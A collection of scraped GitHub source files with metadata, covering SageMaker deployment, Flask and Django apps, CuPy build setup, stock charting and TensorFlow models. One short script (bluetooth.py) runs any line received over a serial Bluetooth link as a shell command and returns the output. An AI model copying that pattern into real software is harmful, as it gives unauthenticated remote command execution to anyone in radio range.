"api_name": "torch.Tensor",
... |
27100233719 | import os
import json
import argparse
from pathlib import Path
import boto3
import sagemaker
from sagemaker.sklearn.estimator import SKLearn
# CloudFormationから環境変数を読み出し
## CFのStack設定
SERVICE_NAME = "sagemaker-serverless-example"
ENV = os.environ.get("ENV", "dev")
STACK_NAME = f"{SERVICE_NAME}-{ENV}"
## Outputsを{Key: Valueの形で読み出し}
stack = boto3.resource('cloudformation').Stack(STACK_NAME)
outputs = {o["OutputKey"]: o["OutputValue"] for o in stack.outputs}
S3_BUCKET = outputs["S3Bucket"]
S3_TRAIN_BASE_KEY = outputs["S3TrainBaseKey"]
S3_MODEL_BASE_KEY = outputs["S3ModelBaseKey"]
SM_ROLE_ARN = outputs["SmRoleArn"]
SM_ENDPOINT_NAME = outputs["SmEndpointName"]
INPUT_PATH = f"s3://{S3_BUCKET}/{S3_TRAIN_BASE_KEY}"
OUTPUT_PATH = f's3://{S3_BUCKET}/{S3_MODEL_BASE_KEY}'
def main(update_endpoint=False):
script_path = str(Path(__file__).parent/"src/iris.py")
train_instance_type = "ml.m5.large"
initial_instance_count = 1
hosting_instance_type = "ml.t2.medium"
sagemaker_session = sagemaker.Session()
# 学習
sklearn = SKLearn(
entry_point=script_path,
train_instance_type=train_instance_type,
role=SM_ROLE_ARN,
sagemaker_session=sagemaker_session,
output_path=OUTPUT_PATH
)
sklearn.fit({'train': INPUT_PATH})
# デプロイ
sklearn.deploy(
initial_instance_count=initial_instance_count,
instance_type=hosting_instance_type,
endpoint_name=SM_ENDPOINT_NAME,
update_endpoint=update_endpoint
)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--update-endpoint', action='store_true')
args = parser.parse_args()
update_endpoint = args.update_endpoint
main(update_endpoint) | ikedaosushi/serverless-sagemaker-example | iris/script/train.py | train.py | py | 1,797 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "os.environ.get",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "boto3.resource",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"lin... |
10828794870 | # 효율성 실패
from collections import deque
def bfs(node,visit,dist,n):
q = deque()
visit[node] = 1
dist[node] = 0
q.append(node)
while q:
x = q.popleft()
if x == n:
return dist[n]
if x < n+1:
if x*2 < n+1:
if dist[x*2] == -1 and visit[x*2] == 0:
dist[x*2] = dist[x]
visit[x*2] = 1
q.appendleft(x*2)
if x+1 < n+1:
if dist[x+1] == -1 and visit[x+1] == 0:
dist[x+1] = dist[x] + 1
visit[x+1] = 1
q.append(x+1)
def solution(n):
ans = 0
visit = [0 for _ in range(n+1)]
dist = [-1 for _ in range(n+1)]
ans = bfs(0,visit,dist,n)
return ans
| choijaehoon1/programmers_level | src/test122_01.py | test122_01.py | py | 843 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 5,
"usage_type": "call"
}
] |
21076570449 | #!/usr/bin/env python
# coding=utf-8
import matplotlib.pyplot as plt
import matplotlib.mlab as mlab
from datetime import datetime,date
import time
import tushare as ts
from matplotlib.dates import DateFormatter, WeekdayLocator, DayLocator, MONDAY, YEARLY, date2num
from matplotlib.finance import quotes_historical_yahoo_ohlc, candlestick_ohlc,candlestick2_ochl
import numpy as np
from util.util import moving_average
def not_empty(s):
return s and s.strip()
def accu_price(price_change):
accu = []
value=1
accu.append(1)
for i in range(1,len(price_change)):
value=value*(1+price_change[i]/100)
accu.append(value)
return accu
def diff_price(price):
diff=[]
diff.append(0)
for i in range (1,len(price)):
value=(price[i]-price[i-1])/price[i-1]*100
diff.append(value)
return diff
def cut_date(quotes, date1, date2):
ret=[]
for q in quotes:
if date1<q[0]<date2:
ret.append(q)
return ret
def main(stock):
hist_data = ts.get_hist_data(stock)
quotes = []
print(hist_data.head())
hist_data.sort(columns ='')
for dates, row in hist_data.iterrows():
# 将时间转换为数字
date_time = datetime.strptime(dates, '%Y-%m-%d')
t = date2num(date_time)
# open, high, low, close,volume = row[:5]
# datas = (t, open, high, low, close,volume)
quotes.append((t, row['open'], row['high'], row['low'], row['close'], row['volume'],row['p_change'])) # Date,Open,High,Low,Close,Volume
# quotes.append(datas)
date1 = date2num(date(2017, 9, 1)) # 起始日期,格式:(年,月,日)元组
date2 = date2num(date(2018, 6, 1)) # 结束日期,格式:(年,月,日)元组
quotes = cut_date(quotes, date1, date2)#Date,Open,High,Low,Close,Volume,Adj Close
dates = [q[0] for q in quotes]
opens = [q[1] for q in quotes]
highs=[q[2] for q in quotes]
lows=[q[3] for q in quotes]
closes=[q[4] for q in quotes]
price_change=[q[6] for q in quotes]
# price_change=diff_price(closes)
# accu=accu_price(price_change)
# print(price_change)
# print(accu)
# print(closes)
ma20 = moving_average(closes, 20)
fig, ax = plt.subplots()
fig.subplots_adjust(bottom=0.2)
# ax.xaxis_date()
ma5 = moving_average(closes, 5)
ma30 = moving_average(closes, 30)
# ax.plot_date(dates, accu, 'r-')
ax.plot_date(dates, ma30, '-')
candlestick_ohlc(ax, quotes, width=0.6, colorup='r', colordown='g')
ax.grid(True)
plt.title(stock)
plt.show()
return
if __name__ == '__main__':
main("600519")
| jcjview/stock | src/tushare_candle.py | tushare_candle.py | py | 2,646 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tushare.get_hist_data",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 48,
"usage_type": "name"
},
{
"api_name": "ma... |
12298632553 | import re
from setuptools import setup, find_packages
from marcus import __version__
# Installation a packages from "requirements.txt"
requirements = open('requirements.txt')
install_requires = []
dependency_links = []
try:
for line in requirements.readlines():
line = line.strip()
if line and not line.startswith('#'): # for inline comments
if "#egg" in line:
names = re.findall('#egg=([^-]+)-', line)
install_requires.append(names[0])
dependency_links.append(line)
else:
install_requires.append(line)
finally:
requirements.close()
# Getting long_description
long_description = ""
try:
readme = open("README.rst")
long_description = str(readme.read())
readme.close()
except:
pass
setup(
name='django-marcus',
version=__version__,
description="Bilingual blog on Django",
long_description=long_description,
keywords='django, blog',
author='Mikhail Andreev',
author_email='x11org@gmail.com',
url='http://github.com/adw0rd/marcus',
license='BSD',
packages=find_packages(),
zip_safe=False,
install_requires=install_requires,
dependency_links=dependency_links,
package_data={'': ['requirements.txt']},
include_package_data=True,
classifiers=[
"Environment :: Web Environment",
"Programming Language :: Python",
"Framework :: Django",
"License :: OSI Approved :: BSD License",
"Topic :: Software Development :: Debuggers",
"Topic :: Software Development :: Libraries :: Application Frameworks",
"Topic :: Software Development :: Libraries :: Python Modules",
],
)
| Carbon8Jim/marcus | setup.py | setup.py | py | 1,715 | python | en | code | null | github-code | 36 | [
{
"api_name": "re.findall",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "setuptools.setup",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "marcus.__version__",
"line_number": 33,
"usage_type": "name"
},
{
"api_name": "setuptools.find_packag... |
25796479489 | from django.core.management import BaseCommand
from integrations.left_right_eye_nn.LeftRightEyeNN import LeftRightEyeNN
class Command(BaseCommand):
def handle(self, *args, **options):
self.main()
def main(self):
print("Training Left Right Eye NN")
nn = LeftRightEyeNN()
nn.generate_data()
nn.train() | AkaG/inz_retina | integrations/management/commands/left_right_eye.py | left_right_eye.py | py | 352 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.core.management.BaseCommand",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "integrations.left_right_eye_nn.LeftRightEyeNN.LeftRightEyeNN",
"line_number": 13,
"usage_type": "call"
}
] |
6446628913 | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 5 22:38:07 2020
@author: Ivano Dibenedetto mat.654648
"""
from tkinter import *
from tkinter import ttk
from tkinter import filedialog
from PIL import Image, ImageTk
import cv2
import tensorflow as tf
root = Tk(className=' CLASSIFICATORE')
root.geometry("800x600+250+150")
root.resizable(width=False, height=False)
filename = ""
CATEGORIES = ["Covid", "Polmonite"]
def LoadImage():
filename = filedialog.askopenfilename(initialdir="/", title="Select file",
filetypes=(("jpeg files", "*.jpg"), ("png files", "*.png")))
load = Image.open(filename)
load = load.resize((300, 300), Image.ANTIALIAS)
render = ImageTk.PhotoImage(load)
img = Label(image=render, text=filename)
img.image = render
img.place(x=250, y=150)
classifica(filename)
def classifica(filename):
print(filename)
model = tf.keras.models.load_model("X-ray_CNN.model")
prediction = model.predict_proba([prepare(filename)])
score = prediction[0]
ris = "il paziente è affetto da " + CATEGORIES[int(prediction[0][0]) ]
print(
"This image is %.2f percent COVID and %.2f percent PNEUMONIA."
% (100 * (1 - score), 100 * score))
predLabel.config(text=ris)
def prepare(filepath):
IMG_SIZE = 250 # dimensione
img_array = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE) # scala di grigi
new_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
return new_array.reshape(-1, IMG_SIZE, IMG_SIZE, 1)
introLabel = ttk.Label(root,
text="Rete neurale che classifica l'immagine di una radiografia al torace in una delle possibili etichette [Polmonite, Covid-19]")
introLabel.place(relx=0.1, rely=0.05)
loadButton = ttk.Button(text="Carica immagine", command=LoadImage)
loadButton.place(relx=0.5, rely=0.15, anchor=CENTER)
predLabel = ttk.Label(root, text="")
predLabel.place(relx=0.5, rely=0.8, anchor=CENTER)
root.mainloop()
| Ivanodib/Neural-Network | GUI.py | GUI.py | py | 2,060 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tkinter.filedialog.askopenfilename",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "tkinter.filedialog",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "PIL.Image.open",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "... |
71122270185 | # Excel写入的代码:
import openpyxl
wb = openpyxl.Workbook()
sheet = wb.active
sheet.title ='豆瓣'
sheet['A1'] = '豆瓣读书'
rows = [['美国队长','钢铁侠','蜘蛛侠','雷神'],['是','漫威','宇宙', '经典','人物']]
for i in rows:
sheet.append(i)
print(rows)
wb.save('Marvel.xlsx') | amuamu123/python_offices | EXECEL/CSV和EXCEL的基础写入方式/Excel写入的代码.PY | Excel写入的代码.PY | py | 312 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "openpyxl.Workbook",
"line_number": 4,
"usage_type": "call"
}
] |
36567852803 | from django.shortcuts import render
from django.contrib.auth import login, logout
from django.http.response import HttpResponseRedirect, JsonResponse
from .forms import RegistrationForm, LoginForm
from django.contrib.auth.models import User
from django_mfa.models import is_u2f_enabled
from django.conf import settings
def index(request):
if request.user and request.user.is_authenticated:
return HttpResponseRedirect(settings.LOGIN_REDIRECT_URL)
if request.method == 'POST':
form = LoginForm(request.POST, request.FILES)
if form.is_valid():
user = form.user
if is_u2f_enabled(user):
request.session['u2f_pre_verify_user_pk'] = user.pk
request.session['u2f_pre_verify_user_backend'] = user.backend
login(request, form.user)
return JsonResponse({"error": False})
else:
return JsonResponse({"error": True, "errors": form.errors})
context = {
"registration_form": RegistrationForm,
"login_form": LoginForm
}
return render(request, 'login.html', context)
def register(request):
form = RegistrationForm(request.POST, request.FILES)
if form.is_valid():
email = form.cleaned_data.get('email')
password = form.cleaned_data.get('password')
user = User.objects.create(email=email, username=email)
user.set_password(password)
user.save()
user.backend = 'django.contrib.auth.backends.ModelBackend'
login(request, user)
return JsonResponse({"error": False})
else:
return JsonResponse({"error": True, "errors": form.errors})
def home(request):
return render(request, "home.html")
def log_out(request):
logout(request)
return HttpResponseRedirect("/")
| MicroPyramid/django-mfa | sandbox/sample/views.py | views.py | py | 1,801 | python | en | code | 176 | github-code | 36 | [
{
"api_name": "django.http.response.HttpResponseRedirect",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "django.conf.settings.LOGIN_REDIRECT_URL",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "django.conf.settings",
"line_number": 12,
"usage_t... |
7048207063 | from flask import Flask, request, jsonify
from flask_pymongo import PyMongo
from bson.objectid import ObjectId
import socket
import gridfs
UPLOAD_FOLDER = 'upload_temp'
ALLOWED_EXTENSIONS = {'pdf'}
app = Flask(__name__)
app.config["MONGO_URI"] = "mongodb://mongo:27017/dev"
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.secret_key = 'hogehoge'
mongo = PyMongo(app)
db = mongo.db
fs = gridfs.GridFS(db)
def list_url():
most_recent_three = fs.find().sort("uploadDate", -1).limit(50)
res = []
for grid_out in most_recent_three:
res.append({
"_id": str(grid_out._id),
"filename": grid_out._file['filename'],
"file_url": grid_out._file['file_url']
})
return res
@app.route("/list")
def index():
pdflist = list_url()
# TODO need to fix abstractive
for p in pdflist:
p['file_url'] = p['file_url'].replace("doktor-upload:3000","doktor.a910.tak-cslab.org:30010")
# pdflist = ["http://doktor-upload:3000/" + word for word in pdflist]
hostname = socket.gethostname()
return jsonify(pdflist)
@app.route("/tasks")
def get_all_tasks():
tasks = db.task.find()
data = []
for task in tasks:
item = {
"id": str(task["_id"]),
"task": task["task"]
}
data.append(item)
return jsonify(
data=data
)
@app.route("/task", methods=["POST"])
def create_task():
data = request.get_json(force=True)
db.task.insert_one({"task": data["task"]})
return jsonify(
message="Task saved successfully!"
)
@app.route("/task/<id>", methods=["PUT"])
def update_task(id):
data = request.get_json(force=True)["task"]
response = db.task.update_one({"_id": ObjectId(id)}, {
"$set": {"task": data}})
if response.matched_count:
message = "Task updated successfully!"
else:
message = "No Task found!"
return jsonify(
message=message
)
@app.route("/task/<id>", methods=["DELETE"])
def delete_task(id):
response = db.task.delete_one({"_id": ObjectId(id)})
if response.deleted_count:
message = "Task deleted successfully!"
else:
message = "No Task found!"
return jsonify(
message=message
)
@app.route("/tasks/delete", methods=["POST"])
def delete_all_tasks():
db.task.remove()
return jsonify(
message="All Tasks deleted!"
)
if __name__ == "__main__":
app.run(host="0.0.0.0", port=4000, debug=True)
| cdsl-research/doktor | service/search/web/main.py | main.py | py | 2,596 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "flask_pymongo.PyMongo",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "gridfs.GridFS",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "socket.gethostname",
... |
7167965957 | import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, 'README.md')) as f:
README = f.read()
requires = [
'gces>=0.0.9a0',
]
extras_require = {
'test': [
'coverage==4.5.1',
'pytest==3.8.1',
'pytest-cov==2.6.0',
'pytest-mock',
'pytest-capturelog>=0.7',
],
'ci': [
'python-coveralls==2.9.1',
]
}
setup(
name='gces_subsfm',
version='0.0.1a0',
description='GCES Subscriber Framework',
long_description=README,
long_description_content_type='text/markdown',
classifiers=[
'Programming Language :: Python',
'License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)',
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
author='Daniel Debonzi',
author_email='debonzi@gmail.com',
url='',
keywords='pubsub gces google',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
extras_require=extras_require,
install_requires=requires,
entry_points = {
'console_scripts': [
'gces-subsfm = gces_subsfm:main'
]
}
)
| debonzi/gces-subscriber-framework | setup.py | setup.py | py | 1,464 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.abspath",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_nu... |
8445855838 | import argparse
import os
import sys
from typing import Any, List, Mapping, Optional, Tuple
import cupy_builder
def _get_env_bool(name: str, default: bool, env: Mapping[str, str]) -> bool:
return env[name] != '0' if name in env else default
def _get_env_path(name: str, env: Mapping[str, str]) -> List[str]:
paths = env.get(name, None)
if paths is None:
return []
return [x for x in paths.split(os.pathsep) if len(x) != 0]
class Context:
def __init__(
self, source_root: str, *,
_env: Mapping[str, str] = os.environ,
_argv: List[str] = sys.argv):
self.source_root = source_root
self.use_cuda_python = _get_env_bool(
'CUPY_USE_CUDA_PYTHON', False, _env)
self.use_hip = _get_env_bool(
'CUPY_INSTALL_USE_HIP', False, _env)
self.include_dirs = _get_env_path('CUPY_INCLUDE_PATH', _env)
self.library_dirs = _get_env_path('CUPY_LIBRARY_PATH', _env)
cmdopts, _argv[:] = parse_args(_argv)
self.package_name: str = cmdopts.cupy_package_name
self.long_description_path: Optional[str] = (
cmdopts.cupy_long_description)
self.wheel_libs: List[str] = cmdopts.cupy_wheel_lib
self.wheel_includes: List[str] = cmdopts.cupy_wheel_include
self.wheel_metadata_path: Optional[str] = (
cmdopts.cupy_wheel_metadata)
self.no_rpath: bool = cmdopts.cupy_no_rpath
self.profile: bool = cmdopts.cupy_profile
self.linetrace: bool = cmdopts.cupy_coverage
self.annotate: bool = cmdopts.cupy_coverage
self.use_stub: bool = cmdopts.cupy_no_cuda
if _get_env_bool('CUPY_INSTALL_NO_RPATH', False, _env):
self.no_rpath = True
if os.environ.get('READTHEDOCS', None) == 'True':
self.use_stub = True
self.features = cupy_builder.get_features(self)
def parse_args(argv: List[str]) -> Tuple[Any, List[str]]:
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument(
'--cupy-package-name', type=str, default='cupy',
help='alternate package name')
parser.add_argument(
'--cupy-long-description', type=str, default=None,
help='path to the long description file (reST)')
parser.add_argument(
'--cupy-wheel-lib', type=str, action='append', default=[],
help='shared library to copy into the wheel '
'(can be specified for multiple times)')
parser.add_argument(
'--cupy-wheel-include', type=str, action='append', default=[],
help='An include file to copy into the wheel. '
'Delimited by a colon. '
'The former part is a full path of the source include file and '
'the latter is the relative path within cupy wheel. '
'(can be specified for multiple times)')
parser.add_argument(
'--cupy-wheel-metadata', type=str, default=None,
help='wheel metadata (cupy/.data/_wheel.json)')
parser.add_argument(
'--cupy-no-rpath', action='store_true', default=False,
help='disable adding default library directories to RPATH')
parser.add_argument(
'--cupy-profile', action='store_true', default=False,
help='enable profiling for Cython code')
parser.add_argument(
'--cupy-coverage', action='store_true', default=False,
help='enable coverage for Cython code')
parser.add_argument(
'--cupy-no-cuda', action='store_true', default=False,
help='build CuPy with stub header file')
return parser.parse_known_args(argv)
| cupy/cupy | install/cupy_builder/_context.py | _context.py | py | 3,616 | python | en | code | 7,341 | github-code | 36 | [
{
"api_name": "typing.Mapping",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "typing.Mapping",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "os.pathsep",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "typing.List",
"line_... |
34957895973 | from os import path
import shutil, glob
from subprocess import Popen, PIPE, STDOUT
from lib import cd, CouldNotLocate, task
class IEError(Exception):
pass
@task
def package_ie(build, root_dir, **kw):
'Run NSIS'
nsis_check = Popen('makensis -VERSION', shell=True, stdout=PIPE, stderr=STDOUT)
stdout, stderr = nsis_check.communicate()
if nsis_check.returncode != 0:
raise CouldNotLocate("Make sure the 'makensis' executable is in your path")
# JCB: need to check nsis version in stdout here?
with cd(path.join(root_dir, 'ie')):
for arch in ('x86', 'x64'):
nsi_filename = "setup-{arch}.nsi".format(arch=arch)
package = Popen('makensis {nsi}'.format(nsi=path.join("dist", nsi_filename)),
stdout=PIPE, stderr=STDOUT, shell=True
)
out, err = package.communicate()
if package.returncode != 0:
raise IEError("problem running {arch} IE build: {stdout}".format(arch=arch, stdout=out))
# move output to root of IE directory
for exe in glob.glob(path.join("dist/*.exe")):
shutil.move(exe, "{name}-{version}-{arch}.exe".format(
name=build.config.get('name', 'Forge App'),
version=build.config.get('version', '0.1'),
arch=arch
)) | workingBen/forge-demo | .template/generate_dynamic/ie_tasks.py | ie_tasks.py | py | 1,203 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "subprocess.Popen",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "subprocess.PIPE",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "subprocess.STDOUT",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "lib.CouldNotLocate... |
35132702835 | import dataclasses
import tensorflow as tf
import gin.tf
from layers.embeddings_layers import EmbeddingsConfig
from models.transformer_softmax_model import TransformerSoftmaxModel, TransformerSoftmaxModelConfig
from datasets.softmax_datasets import MaskedEntityOfEdgeDataset
from datasets.dataset_utils import DatasetType
class TestTransformerSoftmaxModel(tf.test.TestCase):
DATASET_PATH = '../../data/test_data'
def setUp(self):
gin.clear_config()
gin.parse_config("""
StackedTransformerEncodersLayer.layers_count = 3
StackedTransformerEncodersLayer.attention_heads_count = 4
StackedTransformerEncodersLayer.attention_head_dimension = 5
StackedTransformerEncodersLayer.pointwise_hidden_layer_dimension = 4
StackedTransformerEncodersLayer.dropout_rate = 0.5
StackedTransformerEncodersLayer.share_encoder_parameters = False
StackedTransformerEncodersLayer.share_encoder_parameters = False
StackedTransformerEncodersLayer.encoder_layer_type = %TransformerEncoderLayerType.PRE_LAYER_NORM
""")
dataset = MaskedEntityOfEdgeDataset(
dataset_id="dataset1", inference_mode=False, dataset_type=DatasetType.TRAINING,
data_directory=self.DATASET_PATH, shuffle_dataset=False, batch_size=5
)
self.model_inputs = next(iter(dataset.samples))
self.embeddings_config = EmbeddingsConfig(
entities_count=3, relations_count=2, embeddings_dimension=6, use_special_token_embeddings=True,
)
self.default_model_config = TransformerSoftmaxModelConfig(
use_pre_normalization=True, pre_dropout_rate=0.5
)
def test_model_architecture(self):
model = TransformerSoftmaxModel(self.embeddings_config, self.default_model_config)
outputs = model(self.model_inputs)
self.assertAllEqual((5, 3), outputs.shape)
self.assertEqual(735, model.count_params())
def test_pre_normalization_disabled(self):
model_config = dataclasses.replace(self.default_model_config, use_pre_normalization=False)
model = TransformerSoftmaxModel(self.embeddings_config, model_config)
outputs = model(self.model_inputs)
self.assertAllEqual((5, 3), outputs.shape)
self.assertEqual(723, model.count_params())
def test_use_relations_outputs(self):
model_config = dataclasses.replace(self.default_model_config, use_relations_outputs=True)
model = TransformerSoftmaxModel(self.embeddings_config, model_config)
outputs = model(self.model_inputs)
self.assertAllEqual((5, 5), outputs.shape)
self.assertEqual(737, model.count_params())
def test_do_not_apply_projection_layer(self):
model_config = dataclasses.replace(self.default_model_config)
model = TransformerSoftmaxModel(self.embeddings_config, model_config)
outputs = model(self.model_inputs, apply_projection_layer=False)
self.assertAllEqual((5, 6), outputs.shape)
self.assertEqual(735, model.count_params())
if __name__ == '__main__':
tf.test.main()
| Dawidsoni/relation-embeddings | test/models/test_transformer_softmax_model.py | test_transformer_softmax_model.py | py | 3,150 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tensorflow.test",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "gin.tf.clear_config",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "gin.tf",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "gin.tf.parse_config",... |
13927812222 |
from git import Repo
repo = Repo.init('/Users/yitongli/pytorch')
# print([str(commit.summary) for commit in repo.iter_commits()][1])
# print([str(commit.count) for commit in repo.iter_commits()][0])
# print([str(commit.size) for commit in repo.iter_commits()][0])
# print([str(commit.hexsha) for commit in repo.iter_commits()][0])
# print([commit.message for commit in repo.iter_commits()][2])
# repo.git.diff('HEAD~1')
#Reference:https://azzamsa.com/n/gitpython-intro/
#Unwrapped git functionality
logs=repo.git.log("-p","--format=' }\n{'Hash': '%H', 'Commit-m': '%f', 'Summary': '%b',\n 'gitdiff': '")
logs_split = logs.splitlines()
type(logs_split)
# with open("txt.txt", "w") as f:
# for t in logs_split[:1000]:
# print(t, file=f)
# ID_mark = [ i for i in range(len(logs_split)) if logs_split[i] == '<<<<<<<ID>>>>>>>' ]
# gitdiff_mark = [ i[0:11] for i in logs_split]
# gitdiff_mark_index = [gitdiff_mark.index('diff --git ',ID_mark[i]) for i in range(len(ID_mark))]
# logs_split_cleaner = logs_split
# for i in gitdiff_mark_index:
# logs_split_cleaner[i-1] = 'gitdiff:'
#
#
# filter(lambda x: ' A ' in x, logs_split_cleaner)
logs_split_cleaner = logs_split
for i in logs_split_cleaner[:1000]:
print(i)
# logs_H=repo.git.log("--pretty=format:(%H,%f,%b)")
# logs_split_H = logs_H.splitlines()
# for i in logs_split_H[:50]:
# print(i)
| Spring010/kano_auto_commit_message | repo.py | repo.py | py | 1,374 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "git.Repo.init",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "git.Repo",
"line_number": 3,
"usage_type": "name"
}
] |
41842464083 | import serial
import os
bluetooth = serial.Serial(0,9600)
#ser.isOpen()
while True:
recieve = bluetooth.readline()
recieve = recieve[0:-2]
result = os.popen(recieve).read()
bluetooth.write(result)
bluetooth.write('---------------------------------------------------------\n')
| fsaaa168/Radxa | service/bluetooth.py | bluetooth.py | py | 281 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "serial.Serial",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "os.popen",
"line_number": 8,
"usage_type": "call"
}
] |
27688509753 | import csv
import os
import numpy as np
import tensorflow as tf
from tensorflow.keras.preprocessing.image import ImageDataGenerator
def get_data(filename):
# You will need to write code that will read the file passed
# into this function. The first line contains the column headers
# so you should ignore it
# Each successive line contians 785 comma separated values between 0 and 255
# The first value is the label
# The rest are the pixel values for that picture
# The function will return 2 np.array types. One with all the labels
# One with all the images
#
# Tips:
# If you read a full line (as 'row') then row[0] has the label
# and row[1:785] has the 784 pixel values
# Take a look at np.array_split to turn the 784 pixels into 28x28
# You are reading in strings, but need the values to be floats
# Check out np.array().astype for a conversion
with open(filename) as training_file:
csv_reader = csv.reader(training_file, delimiter=',')
first_line = True
temp_labels = []
temp_images = []
for row in csv_reader:
# Makes first iteration of loop for first row do nothing.
# That's how you skip the first row with headers.
if first_line:
first_line = False
else:
temp_labels.append(row[0])
image_data = row[1:785]
image_array = np.array_split(image_data, 28) # Make 28 x 28
temp_images.append(image_array)
images = np.array(temp_images).astype('float')
labels = np.array(temp_labels).astype('float')
return images, labels
path_sign_mnist_train = "/Users/seanjudelyons/Downloads/3258_5337_bundle_archive/sign_mnist_train.csv"
path_sign_mnist_test = "/Users/seanjudelyons/Downloads/3258_5337_bundle_archive/sign_mnist_test.csv"
training_images, training_labels = get_data(path_sign_mnist_train)
testing_images, testing_labels = get_data(path_sign_mnist_test)
print(training_images.shape)
print(training_labels.shape)
print(testing_images.shape)
print(testing_labels.shape)
# Their output should be:
# (27455, 28, 28)
# (27455,)
# (7172, 28, 28)
# (7172,)
training_images = np.expand_dims(training_images, axis=3)
testing_images = np.expand_dims(testing_images, axis=3)
train_datagen = ImageDataGenerator(
rescale=1. / 255,
rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode='nearest')
validation_datagen = ImageDataGenerator(
rescale=1. / 255)
#next
# Define the model
# Use no more than 2 Conv2D and 2 MaxPooling2D
model = tf.keras.models.Sequential([
# Note the input shape is 28 x 28 grayscale.
tf.keras.layers.Conv2D(64, (3,3), activation='relu', input_shape=(28, 28, 1)),
tf.keras.layers.MaxPooling2D(2, 2),
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(26, activation='softmax') # 26 alphabets/hand-signs so 26 classes!
])
# Compile Model.
# loss = 'categorical_crossentropy' doesn't work for some reason.
model.compile(loss = 'sparse_categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])
# Train the Model
history = model.fit_generator(train_datagen.flow(training_images, training_labels, batch_size=32),
epochs=2,
validation_data=validation_datagen.flow(testing_images, testing_labels, batch_size=32),
validation_steps=len(testing_images) / 32)
model.evaluate(testing_images, testing_labels)
model.evaluate(testing_images, testing_labels)
# Plot the chart for accuracy and loss on both training and validation
import matplotlib.pyplot as plt
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(acc))
plt.plot(epochs, acc, 'r', label='Training accuracy')
plt.plot(epochs, val_acc, 'b', label='Validation accuracy')
plt.title('Training and validation accuracy')
plt.legend()
plt.figure()
plt.plot(epochs, loss, 'r', label='Training Loss')
plt.plot(epochs, val_loss, 'b', label='Validation Loss')
plt.title('Training and validation loss')
plt.legend()
plt.show()
| seanjudelyons/TensorFlow_Certificate | Sign Language Part 2(CNN) Last exercise.py | Sign Language Part 2(CNN) Last exercise.py | py | 4,470 | python | en | code | 12 | github-code | 36 | [
{
"api_name": "csv.reader",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.array_split",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_numb... |
40156974543 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
# Copyright (c) 2017/18 Dennis Wulfert
#
# GNU GENERAL PUBLIC LICENSE
# Version 2, June 1991
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
